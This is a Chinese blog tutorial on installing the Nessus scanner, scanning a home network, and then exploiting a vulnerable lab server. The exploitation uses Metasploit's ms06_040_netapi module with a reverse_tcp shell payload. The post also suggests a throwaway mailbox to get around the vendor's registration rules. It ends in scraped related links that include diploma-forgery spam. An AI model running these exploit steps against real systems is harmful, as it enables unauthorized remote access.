0x 00 前言

  写这篇博客,证明我还活着……

  

0x 01 安装Nessus 

  直接官网  www.tenable.com/products/nessus/select-your-operating-system

  选择Nessus Home版下载,下载之后点击安装我这里是Nessus-6.1.0-x64版(附件处有百度网盘链接)

  安装开始设置一个用户名和密码(记住,使用Nessus时会验证)

  然后选择文件安装目录

  之后会提示更新插件,这个要通过官网注册获取激活码来更新的

  我们在官网 www.tenable.com/products/nessus/evaluate注册账户,打开注册邮箱就可以收到激活码了~

  注意:注册邮箱不能使用 qq\163\gmail\hotmail 等公共邮箱,要用企业邮箱才可以

  在这里推荐使用“一小时邮箱”进行注册,具体使用方法问度娘吧

  填好激活码之后,插件自动更新,我这里5分钟左右就更新好了

0x 02  软件使用

    浏览器打开  https://localhost:8834   后显示客户端界面

    输入先前设置的用户名密码登录

  1. 扫描局域网存活主机

    点击“New Scan”,

    在提供的默认模版里选择一个模版,这里选择“Host Discovery”,

    在弹出的通用配置里设置“Name”(本次扫描的名字),“Target”(扫描目标)

    我扫的是192.168.1.1全网段的 ,看图

     

    之后“点击保存”后会进行自动扫描

    2分钟之后结果就来了,在这里

      

    看到了米有,9个主机在线,测试结果与真实环境相同的

    NMAP也能完成主机探测我会乱说,所以说Nessus牛的地方不是在这,所以下面来了

  2. 主机扫描

    我在本地搭了个低版本服务器,IP为192.168.1.112

    新建扫描,设置扫描策略为“Advanced Scan”,

    然后 “Target”填上192.168.1.112

    因为扫的是同个局域网内的速度还是比较快的,结果倒是让我惊呆了Orz...

    

    20个紧急漏洞,8个高危漏洞,醉了有木有 = =  速度戳之

    

    上面MSxx-xxx是微软漏洞编码,随随便便选择一个找到Exp就可以愉悦的玩耍了  ~~

    接下来漏洞结合MSF进行漏洞利用~

    当然,直接根据漏洞的编码百度一下利用方法也是可以的,这里就直接用BT5吧

    找一个比较老的洞:ms06-040

    BT5 的 CMD 输入 msfconsole 进入MSF欢迎界面(时间略长,等下就OK了)

    我们按照MSF的一般执行过程来操作(选择模版—设置PAYLOAD—设置参数—攻击)

search ms06_040        // 查找ms06_040相关漏洞模块

    找到对应模块后

use exploit/windows/smb/ms06_040_netapi  // 使用ms06_040_netapi模块
show options // 查看漏洞配置信息
set PAYLOAD windows/shell/reverse_tcp // 设置PAYLOAD
set RHOST 192.168.1.112 // 目标IP
set LHOST 192.168.1.117 // 本机IP
// 端口号 和 目标类型 默认就OK了
exploit // 进行攻击

    然后看拿到拿到了神马……

    

附件:

  Nessus-6.1.0-x64  百度网盘:pan.baidu.com/s/1hq48j20     9fgu

  

『安全工具』Nessus多功能扫描器的更多相关文章

  1. 『安全工具』Nmap 强悍的端口扫描工具

    作为时下流行的端口扫描工具,Nmap有因其扫描的隐密性有“端口扫描之王”之称 上图是黑客帝国(The Matrix)中崔妮蒂用Nmap入侵核发电站的能源管理系统 0x 01 Nmap介绍 Nmap是一 ...

  2. 『安全工具』目录扫描 DirBuster AND 御剑

    要想熟悉目标网站的体系架构,知道网站有哪些目录是必不可少的 向AWVS,Burp类大型扫描工具也可以进行目录扫描,不过个人感觉远没有专业扫描工具来的简单,实在 0x 01 DirBuster 简介:D ...

  3. 『安全工具』注入神器SQLMAP

    Pic by Baidu 0x 00 前言 正是SQLMAP这种神器的存在,SQL注入简直Easy到根本停不下来.... PS:国内类似软件也有阿D,明小子,挖掘机,当你用过他们之后你才会发现SQLM ...

  4. 『 效率工具 』Spring Boot版的轻量级代码生成器,减少70%以上的开发任务

    一. 前言 之前很着迷于代码自动生成,减少写重复代码的工作量.网络上也搜索了很久,有基于插件的,有GUI的.但其配置和学习成本都比较高,都不是很如我意. 本想自己用SpringBoot写一个,在收集相 ...

  5. 『在线工具』 基于 xsser.me 源码 + BootStrap 前端 的 XSS 平台

    乌云社区上一个小伙伴的对xsser.me 的源码做了 BS 的优化,本人已经搭建好,提供给大家免费使用,大牛求绕过,多谢. 地址: http://xss.evilclay.com (目前开放注册,不需 ...

  6. 『开发技巧』Python音频操作工具PyAudio上手教程

    『开发技巧』Python音频操作工具PyAudio上手教程 ​ 0.引子 当需要使用Python处理音频数据时,使用python读取与播放声音必不可少,下面介绍一个好用的处理音频PyAudio工具包. ...

  7. Github 恶搞教程(一起『玩坏』自己的 Github 吧)

    最近在伯乐在线读到一篇趣文,<如何在 Github『正确』做贡献>,里面各种能人恶搞 Github 的『Public contributions』,下面截取几个小伙伴的战绩: 顺藤摸瓜,发 ...

  8. 办理卡尔加里大学(本科)学历认证『微信171922772』calgary学位证成绩单使馆认证University of calgary

    办理卡尔加里大学(本科)学历认证『微信171922772』calgary学位证成绩单使馆认证University of calgary Q.微信:171922772办理教育部国外学历学位认证海外大学毕 ...

  9. 办理阿尔伯塔大学(本科)学历认证『微信171922772』Alberta学位证成绩单使馆认证University of Alberta

    办理阿尔伯塔大学(本科)学历认证『微信171922772』Alberta学位证成绩单使馆认证University of Alberta Q.微信:171922772办理教育部国外学历学位认证海外大学毕 ...

随机推荐

  1. fstream的用法

    本文转载自 http://www.newxing.com/Tech/Program/Cpp/577.html   C++文件流:fstream // 文件流ifstream  // 输入文件流ofst ...

  2. QThread 与 QObject的关系

    Threads and QObjects QThread 继承 QObject..它可以发送started和finished信号,也提供了一些slot函数. QObject.可以用于多线程,可以发送信 ...

  3. 如何安装Windows 8系统中的telnet组件

    知识点分析:Window 8 系统中Telnet没有默认安装,成为了一个可选组件,“启用或关闭Windows功能”下即可添加此组件. 操作步骤:1.系统桌面下同时按住键盘上 “Windows” 和“X ...

  4. Sublime Text3 配置markdown插件

    sublime是一个亮骚的文本编辑器,而且是跨三大平台,而markdown是一门标记语法,对于记录真是神器,具体语法百度很多,下面教你在sublime上配置markdown. 这两个神器结合起来简直好 ...

  5. Ubuntu+Win7+Samba实现文件共享

    Samba是Ubuntu和Windows进行网络共享的工具,比如分享打印机,互相之间传输资料文件. 安装samba sudo apt-get install samba 查看samba是否安装成功 s ...

  6. [RxJS] Creation operators: from, fromArray, fromPromise

    The of() operator essentially converted a list of arguments to an Observable. Since arrays are often ...

  7. Cocos2D-X2.2.3学习笔记12(瞬间动作)

    到眼下我们已经学习了有 坐标系统 内存管理 UI系统 事件处理 几何图形 今天我们来学习动作管理OK 我们来看看类结构图 CCAction   全部动作的基类 以下派生了三个子类:CCFiniteTi ...

  8. 4G时代来临,运营商为谁搭台献唱?

        4G时代已然来临.对用户而言,4G意味着更快的传输速度,以及更优质的移动网络体验. 只是对运营商而言.怎样部署4G却成了一大难题.众所周知,在全球范围内,4G LTE成为眼下最率先的移动宽带解 ...

  9. [转] When exactly does the virtual table pointer (in C++) gets set for an object?

    PS: http://stackoverflow.com/questions/7934540/when-exactly-does-the-virtual-table-pointer-in-c-gets ...

  10. Java基础知识强化80:Math类random()方法的小扩展(控制产生目的数字的概率)

    1. Math.random()方法: Math.random()出现的数据是0.0<= x < 1.0之间,随机出现一个数据Math.random()>0.1概率是0.9 那么如下 ...